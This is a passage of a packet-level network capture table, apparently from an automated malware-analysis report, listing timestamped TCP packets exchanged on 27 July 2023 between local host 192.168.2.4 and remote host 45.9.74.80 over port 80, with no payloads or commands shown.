Jul 27, 2023 20:18:59.964631081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964692116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964749098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964806080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964827061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964886904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.964914083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.964976072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965035915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965095043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965131044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965193987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965229034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965287924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965347052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965401888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965460062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965487003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965539932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965583086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965629101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965656042 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965687037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965714931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965753078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965801954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965847969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965872049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.965920925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.965969086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966013908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966047049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966082096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966121912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966166973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966212034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966259003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966281891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966321945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966361046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966424942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966473103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966521978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966545105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966588974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966631889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966687918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966741085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966793060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966814995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966854095 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.966892004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.966939926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.968152046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.972402096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972466946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972517014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972572088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972600937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.972651005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.972688913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972737074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972786903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972837925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972862005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.972899914 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.972939968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.972990036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.973036051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.973098993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.973164082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.973215103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.973248005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.973298073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.973648071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.974423885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.977886915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.977924109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.977945089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.977963924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.977982998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.978005886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.978024006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.978050947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.978070021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.981545925 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.982712030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982741117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982763052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982789993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982804060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.982829094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.982845068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982872963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982899904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982918978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982932091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.982953072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.982963085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.982983112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.983002901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.983021021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.983033895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.983061075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.983371019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989115953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989141941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989206076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989236116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989253998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989299059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989316940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989336014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989358902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989383936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989401102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989420891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989437103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989455938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989474058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989491940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989504099 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989523888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989533901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989552021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989643097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989660978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989676952 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989694118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989703894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989723921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989742041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989759922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989772081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989792109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989800930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989820004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989837885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989852905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989869118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989886999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989905119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989921093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989936113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989945889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.989964008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.989981890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990000963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990012884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990031958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990041971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990058899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990072966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990091085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990109921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990124941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990142107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990150928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990170002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990189075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990206003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990221977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990246058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990256071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990272999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990291119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990307093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990320921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990339994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990355968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990371943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990386963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.990396976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.990416050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.991816998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.991838932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995126963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995404005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995423079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995460987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995475054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995502949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995522976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995558023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995564938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995589018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995594978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995615005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995632887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995651007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995662928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995682001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995692015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995711088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995728970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995748043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.995762110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.995789051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.996835947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.000114918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.000143051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.000166893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.000200987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.000232935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.000278950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.000288963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.000315905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.001094103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.003755093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.003782988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005125999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.005268097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005296946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005321980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005347967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005369902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.005387068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.005407095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005433083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005456924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005481005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005494118 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.005517006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.005533934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005559921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005589008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.005639076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013183117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013247013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013294935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013319016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013344049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013389111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013439894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013484001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013535023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013546944 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013575077 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013609886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013653994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013696909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013740063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013761044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013801098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013828993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013875961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013921976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.013959885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.013987064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014027119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014053106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014101982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014147997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014188051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014214039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014255047 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014276028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014322042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014367104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014408112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014432907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014472008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014498949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014544010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014589071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014631033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014652967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014698982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014739990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014763117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014801025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014828920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014873981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014919043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.014959097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.014985085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015022039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.015050888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015098095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015141010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015187025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.015203953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015244007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.015269995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015314102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015357971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015409946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015424013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.015451908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.015485048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015533924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015578032 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015621901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015669107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.015769005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018543005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018577099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018604040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018629074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018655062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018676043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018701077 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018712997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018738985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018764973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018785000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018802881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018829107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018855095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018879890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018902063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.018913031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018939018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.018964052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.019011021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.020008087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.020081997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.022396088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.022435904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.022499084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.023255110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.023288965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.023315907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.023341894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.023356915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.023386002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.027353048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.027403116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.027508020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.028084993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028140068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028170109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028197050 CEST	80	49693	45.9.74.80	192.168.2.4
